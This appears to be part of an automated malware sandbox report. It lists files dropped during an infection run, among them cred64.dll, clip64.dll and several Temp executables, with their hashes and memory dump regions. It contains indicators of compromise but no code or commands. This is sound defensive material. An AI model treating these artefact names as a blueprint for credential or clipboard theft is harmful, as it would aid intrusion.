SHA512 c6b8fd1893bef4078b5a18a9192a07cdf0544253208dbba725a0dbdafc0c393f9059b152635f16880b94332e5d57dcc6138f4c9a155d1a877a0726919e503d05

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 4be3a97c44caad88de0df660f2c6a925
SHA1 8d43924870c8edaccfa363d6818bb36229813dcd
SHA256 2c7932c7c1c8e425b9361f7c3b504c823435e4aac7c6a8a114088cb544e0936e
SHA512 cb41e68c1bd4046f44e1126736058cfec453f1f5fe5fd118c1ae5bb604ac926ecb310768834c619d6abecc045746b2961b56d73086f43bcac9df7351987f1939

memory/8056-690-0x0000000000400000-0x0000000000480000-memory.dmp

memory/8152-691-0x00000000747F0000-0x0000000074FA0000-memory.dmp

memory/7408-700-0x00000000747F0000-0x0000000074FA0000-memory.dmp

memory/8152-701-0x0000000007270000-0x0000000007280000-memory.dmp

memory/8056-702-0x00000000747F0000-0x0000000074FA0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 ab0134e98b74527eb6055ae24715ec89
SHA1 4f6846185a28c55c019c5cd5527a74c4266594c4
SHA256 4628e67195807293a9f79158feb37de9c8223aee367f4648541d35998be3102c
SHA512 a3ae02adc8f1ae650c55c8783a16dcb5e95b34b6dd838c7316415e1c8c3cb48968fcd93e889e29116c4fbdbc72bdceff13524051a0cc75c97df4792e24738af4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 ca22b3df05eda70105e988d90d9f444e
SHA1 72e18b0b40fcd63b41bcd8b803e5a1523c02eab1
SHA256 61d1951f8d70fd438b67a36eaedef478558c74a50f31a9ddc03d100bb6064104
SHA512 80a4b5a383eba723bca0fae519e905d4cddf79c51a93c03a333bef32dbda3e2d9ba9e100c182c3f4fd05bf290a31ad1ad84bee22db43bc8f85d9cb3998c45286

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 24949b9b027911e1561ae4edd3499fc2
SHA1 540b867516d5e87880683f99085e521e0efe0bdc
SHA256 2eccf7960a72b7c7a6b42f3782820bdbd32cdfb84a16105d915a3c5d8b562a77
SHA512 5748469d66ffba4a48c0857c38bca58a511f434264ca4f03d4fba592cf822ef08af6787f2c1376e262f6858817e3f0e23811565bedd8ed5dc47890ef3b7253fe

memory/7096-797-0x00000000747F0000-0x0000000074FA0000-memory.dmp

memory/7096-807-0x0000000000B60000-0x0000000001544000-memory.dmp

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

memory/2028-825-0x00000000747F0000-0x0000000074FA0000-memory.dmp

memory/2028-826-0x0000000000340000-0x0000000000720000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 6e68805f0661dbeb776db896761d469f
SHA1 95e550b2f54e9167ae02f67e963703c593833845
SHA256 095e2b0ed70525cf5a7a5c31241aad5c27964fd69d68569c646a158c0ff50b47
SHA512 5cf25502b2fc8ab34b777b490493c8974af15135e8ff81f43ff254b910f74ee5cece6848ca4a5adae54b8cbf895362f268fd1665705f39bee27f395ea5c04efc

memory/7096-831-0x00000000747F0000-0x0000000074FA0000-memory.dmp

memory/7920-843-0x0000000000400000-0x0000000000461000-memory.dmp

memory/7920-852-0x00000000001C0000-0x00000000001FE000-memory.dmp

memory/7920-856-0x00000000747F0000-0x0000000074FA0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 42d15f56613045f689de15a56a1e9c85
SHA1 e3708445bcb76c224771abf736b00763ef05998f
SHA256 6dcebcd6f1f808e0d9a3b6c9e55f91e07f43098e16ec4793544b9b2904b6d095
SHA512 c771c866b7d13265a125c296eb4aba2570e5b01d81e41e185fdd40b5152db3f67a79f515574f2becf7040aa9bda567dd7bb27994e5ca45e3548013b45635dd20

memory/7920-864-0x00000000076D0000-0x00000000076E0000-memory.dmp

memory/2028-874-0x00000000747F0000-0x0000000074FA0000-memory.dmp

memory/7392-879-0x0000000000A00000-0x0000000000B00000-memory.dmp

memory/7392-880-0x00000000023C0000-0x00000000023C9000-memory.dmp

memory/6584-881-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 89c82822be2e2bf37b5d80d575ef2ec8
SHA1 9fe2fad2faff04ad5e8d035b98676dedd5817eca
SHA256 6fea30b9d17eacffde43b727058b5b2c422a7b70407534549042ba7b20d5f8c9
SHA512 142ca76bc32cc60c11f640bd9e050df6000b6824a192595416f661d22d6e52704dfd369974d7f2f73d01eaa356237c50778737d72d5588c5a2ff8a8010ee8101

memory/6584-885-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2028-888-0x0000000004F70000-0x000000000500C000-memory.dmp

memory/1032-895-0x00000000747F0000-0x0000000074FA0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\kos4.exe

MD5 01707599b37b1216e43e84ae1f0d8c03
SHA1 521fe10ac55a1f89eba7b8e82e49407b02b0dcb2
SHA256 cc0dbc1d31ccd9488695b690bd7e7aa4a90ba4b2a5d23ef48b296465f5aa44dd
SHA512 9f9ff29a12d26a7d42656e0faf970c908f1ef428b14e5a5fe7acd06371b96b16eb984e8fbee4e2b906c6db7fb39c9d4a221e79fc3d5e9ca9b59e377875bc5642

memory/7920-906-0x0000000000400000-0x0000000000461000-memory.dmp

memory/1032-909-0x0000000000F00000-0x0000000000F1E000-memory.dmp

memory/6108-925-0x0000000000400000-0x0000000000408000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 a3eacc459b8c6a463a52688437d507d6
SHA1 f548e28d784151177e5bb7ea17fafee9f2ab750e
SHA256 b1dabd7e6f62f8377f70ab0b8a20fc15609db8b164fc803b9a7df97298d05f4d
SHA512 fab8574f6ff2289685296b74af779fef91a34b569324c4f33be5e1b8b7aa48c1394df671e23055b6e5924dd478c9a999025826d5065632465349b634c99b4642

memory/6108-971-0x00007FFBB3BB0000-0x00007FFBB4671000-memory.dmp

memory/7920-1007-0x00000000747F0000-0x0000000074FA0000-memory.dmp

memory/6108-1008-0x000000001B050000-0x000000001B060000-memory.dmp

memory/1032-1009-0x00000000056F0000-0x0000000005700000-memory.dmp

memory/3304-1010-0x00000000028E0000-0x00000000028F6000-memory.dmp

memory/6584-1011-0x0000000000400000-0x0000000000409000-memory.dmp

memory/7920-1025-0x00000000076D0000-0x00000000076E0000-memory.dmp

memory/4448-1026-0x0000000002A60000-0x0000000002E64000-memory.dmp

memory/7096-1027-0x00000000747F0000-0x0000000074FA0000-memory.dmp

memory/4448-1036-0x0000000002E70000-0x000000000375B000-memory.dmp

memory/4448-1043-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/6108-1159-0x00007FFBB3BB0000-0x00007FFBB4671000-memory.dmp

memory/2028-1172-0x0000000004EA0000-0x0000000004EAA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe

MD5 b6d627dcf04d04889b1f01a14ec12405
SHA1 f7292c3d6f2003947cc5455b41df5f8fbd14df14
SHA256 9da10d7b75c589f06f1758ed8e3c0335b9a738d0ad1317c48e380bca768bdddf
SHA512 1eef46fcb568049edad6a6dac0ce6532185f15d2b4f9939853226a4f24e0732f637951c98f580efdb98ef396d3f4d9846bccffa22c0309b455432c98292af937

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\a9bf1521-29cb-4fe4-bbcf-3d8ef855c11f\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000033

MD5 9ee8d611a9369b4a54ca085c0439120c
SHA1 74ac1126b6d7927ec555c5b4dc624f57d17df7bb
SHA256 e4cf7a17182adf614419d07a906cacf03b413bc51a98aacbcfc8b8da47f8581c
SHA512 926c00967129494292e3bf9f35dbcdef8efdbddc66114d7104fcc61aa6866298ad0182c0cbdf923b694f25bb9e18020e674fd1367df236a2c6506b859641c041

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 b249ad372da84f5277531f2b2dba516b
SHA1 1bdd8f15998bf86a5b7cc8c8c7979b907bc724fc
SHA256 7647614912b586ff61050c01a9d44256d651d38390237ab34d6e71a53c0d3a81
SHA512 e4c468f401627b6c194ee5ec83dd53ba5fdaf4678dcfa7e8cecba4ab08a6fe495779db7c1a638995c24ae1235dc016642143f01bc974de85166163295e5d321e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\index.txt

MD5 7841ef79156b1a47bd5186151f18bd21
SHA1 538253a6f1bfaff95f1391908ac1c24eb6bc940c
SHA256 7eb786d82affddce23e970819cc12be869578a92205db7417f2aa59174aea7d1
SHA512 fdb94a5bf65da951ed1f0ac7d32a4868c51352eddc05e0e5301ae43b2e14861ed60370564778e4ef9cc956a60c72a02e80440780d8dc7737e4b08a0c8fa711d3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\index.txt~RFe599b0d.TMP

MD5 c2c3a9e5f1df0f8ca5fead78a2fdc599
SHA1 34e12d3bbce430957c81a3f2b27aec2c8d1fd766
SHA256 4cfd1dbada8e8094376e323bf5a8f2ea24e1fa08afcb078fcbc149030ca52afc
SHA512 e6b08601308621dc982a6162efa8cc7ce7e173f520935352c6d0533b51558e8397cb85d53122c694a85c4425d361764c01b99f14f852001a5ca7de0b2d96ce1f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 d8aca17e18d19c401ddc9d565b515d91
SHA1 67a59302f5daf2c812b7a583e8c36acaa464aa70
SHA256 f0d933165377e9b519252fdf12955a88f2dc79b1495ed27e015d6f064e2bdd84
SHA512 f3a1f901ecb25f7482561a8d79c5440faa4d8390f15f565f5ad5138bfdf89a68a179e91ea1c85cafe8a8b43510fcdcfee3e53aa83a04a3df5194eb68679df8ca

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 eb6caf099a9064b081a7a5e15baa184e
SHA1 c1ae7e703f5c61a5b7aa62de29fc6365fadf3539
SHA256 803dfc6972722d787fa8be7c93bd62f93326594d3f22d9261d8ca9c240a7f07d
SHA512 0b5d641cca28be17b9a4ef11f76f91d3961933c16b8268abc0817da673d672d4b46d9a3333eede8962e2e05c0a866b7b01fb638c53287824c36102842d83ccad

C:\Users\Admin\AppData\Local\Temp\114462139309

MD5 ebb0bb6a8d4aa821dc75a210542b40c1
SHA1 552b6af0637268c3a855199cfb631dbe50a76d4f
SHA256 c76879f7c8ac52b73f20953e334d9618738b84a0bc736425841de7f80692ab9e
SHA512 02ef9d0694dcb66482b207c682d4b7a88cf1c76b5ad1adbf2ccd3e1933575c39bfe3743b4bc95c145bf5011e816474a67c10192d54344cd5b5b9552d324cef15

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7a45c8b3472b2e19d28ecbb11ca7d7a4
SHA1 610d45beddf085676462380c55f66f96e51bff0d
SHA256 da922bd396ace9af09787d26d2a9c620a53a79d9cd9b5e95920e0c52d2332225
SHA512 5c418d68ea49351ba73474e319b43a3884a9ca081ca24c56ef170cd00f921f00779b504c112fe2a8d3bcf23397e5b8f1aea99c5c20a1702ed6a98960f00583b2

memory/8816-1404-0x0000000000400000-0x000000000041B000-memory.dmp

memory/8816-1419-0x0000000000400000-0x000000000041B000-memory.dmp

memory/8816-1421-0x0000000000400000-0x000000000041B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 0200dcae586c96fca0f85616302942a2
SHA1 89c1078101641ffc53cd44bd8ab0cee4c2d1f7b3
SHA256 7f88ed8657246f69bf1fba33ab5ffaba9efb8645e46ce9dad55fe1fbf7b3064f
SHA512 08e7c57919419119fa135582630385ad82550419a5970c07f00e500b7db0c4b9ff1360dae684d66cb45080e61e7d4de0e84c837036c8b31221f6263995d7b313

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00003f

MD5 990324ce59f0281c7b36fb9889e8887f
SHA1 35abc926cbea649385d104b1fd2963055454bf27
SHA256 67bcedd3040fc55d968bbe21df05c02b731181541aff4ae72b9205300a4a3ecc
SHA512 31e83da1ac217d25be6e7f35a041881b926f731fff69db6f144e4fe99b696a31f9ab7766ca22cf5a482743c2a2d00a699ca2c2d67837a86c471a2dd3bed9ea1f

C:\Users\Admin\AppData\Roaming\465dbc52837d81\cred64.dll

MD5 1c27631e70908879e1a5a8f3686e0d46
SHA1 31da82b122b08bb2b1e6d0c904993d6d599dc93a
SHA256 478aa272d465eaa49c2f12fc141af2c0581f569ccf67f628747d90cc03a1e6a9
SHA512 7230ccad5e910f4f1aafb26642670c227a5d6e30f9c3de9a111e9c471651e54e352c56f34093667e6a51e78d01f3271c5e9d3248de5e1e82ae0e5d2aaea977dd

C:\Users\Admin\AppData\Roaming\465dbc52837d81\clip64.dll

MD5 ceffd8c6661b875b67ca5e4540950d8b
SHA1 91b53b79c98f22d0b8e204e11671d78efca48682
SHA256 da0bf5520986c2fb92fa9658ee2fcbb07ee531e09f901f299722c0d14e994ed2
SHA512 6f78e3479c7b80cee0c2cea33a5b3e06c65b3e85a558f2df4b72211f714b81a2549daed0bc7ffe1456867b447ede9caeec73a6c4d2b345aad664d501212d07d4

C:\Users\Admin\AppData\Local\Temp\tmpCC50.tmp

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Temp\tmpCE2B.tmp

MD5 bc741c35d494c3fef538368b3cd7e208
SHA1 71deaa958eaf18155e7cdc5494e11c27e48de248
SHA256 97658ad66f5cb0e36960d9b2860616359e050aad8251262b49572969c4d71096
SHA512 be8931de8578802ff899ef8f77339fe4d61df320e91dd473db1dc69293ed43cd69198bbbeb3e5b39011922b26b4e5a683e082af68e9d014d4e20d43f1d5bcc30

C:\Users\Admin\AppData\Local\Temp\tmpD15B.tmp

MD5 fb16d31cb0823e4593addc2c044bfee5
SHA1 66bd13b19f35cf27b8b98636bfddde228f8159c9
SHA256 ca248ebb866436e8ab9d41da5682bb9c615191906e1b49ecabfaf85158938648
SHA512 3d226b9ce32bbc6170741e8a365063a1238defcb478d52144f7e185a9b8c84509c53eaf17c970855f1d373efb8e538458e7f1dd192f70bf09cadde51411f5ac3

C:\Users\Admin\AppData\Local\Temp\tmpD115.tmp

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

C:\Users\Admin\AppData\Local\Temp\tmpD1A6.tmp

MD5 d367ddfda80fdcf578726bc3b0bc3e3c
SHA1 23fcd5e4e0e5e296bee7e5224a8404ecd92cf671
SHA256 0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0
SHA512 40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77

C:\Users\Admin\AppData\Local\Temp\tmpD12B.tmp

MD5 a3324fe998214ca3b7a35ef4161b25c4
SHA1 2c8dda4966fd021085d0ba6615170327ac4293ca
SHA256 321155e57513fa708f3eaad76b7fd48375653f3a39389916557ffe05282361fc
SHA512 d6d08abc0d85c6c9efae4a5b7509102e6f80f803f056e3b5dcf0c91cdf54e2fefc0fc4f655ee23a2bdf3c61e82100980b6dad95b9b9d5a14c616f93067f00a09

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4wrzubyo.5vz.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 4daace57ef1aec1213ee26532615eff8
SHA1 2d9aa69a7b291acdd64490e3ba2d4364a3e19568
SHA256 1b67b43204c3399c7abcceb856fd8866f8697be69324a94ac5629acc166f87b1
SHA512 ee50b690edad11c7881a6d58c3e9ef9b515f88520e81a2ec16b0a2866d3974d9a5b45d1657d46b3d5cbc7a90e93098037474548190d9c81378bccd96a8bc0220

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 34682a55dae021e10ed3152e3d224443
SHA1 e88249d15ca58a65d536cd434e0a9e14dfbb9a3f
SHA256 8550bf8d682c86ab492aa7c16565dea99df806ab154d2520fe683b3133f2fdca
SHA512 e3ff91efd647dfaed9cafcdb15c4845890625fc2b86502edf2c32fb4f0340879660b6e330f4f9ac66d92ce967332dca5cd7d9f72b63a005773bba649d38a4366

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 81ea6f3c592caaa84407818b09a611ac
SHA1 2bf589631f259d4f0f7fbf62bb22bd199f81997c
SHA256 f27e883ce823d8690256f1674d1ad183ba28bea1a85864174ea096d521f69df4
SHA512 87cef6622498c579c7b59b60e47a978f3442b4ace85247ae75c1f7cdc072a64fd9f06fba60a4467a6f4b29894c18bbf6e57f54b8bd978d652110dd0b313ccf61

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 a47861f74c0ea677533d4c8e32efbb5a
SHA1 f3d165eb3da7e1bb03b094f9101c39df40c23c1f
SHA256 d834a24952e6ffef63735931d2e5636aa60aa9b122d2e943a4dddd254609053a
SHA512 e14f3a2119a611114e6ac1e7de3f63f4151cb7a892bfdb27da419197c2a12a05268d77e07f5623a667b719eac8b5b0e8186977338487ce74d915926632dd2626

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 becc82fc01b4973c5ddb88d6ab7a351a
SHA1 f5f38e62c0d977a052f3bd5b0abe03bfdc973207
SHA256 5d5c8e8908976b87982f4ea0f6801fc5d8117ef040010f6a83872501f8d14aa9
SHA512 0a5d7ef632f34ae8daa21bf98fef59038970fa7aa1e7e6ea6339dfc8a868d85a5c01c489935c1cd91302270f8463c276eb3659ce42f23dcb809021b5e2c69dcc

memory/5196-1896-0x00007FF70DDC0000-0x00007FF70E361000-memory.dmp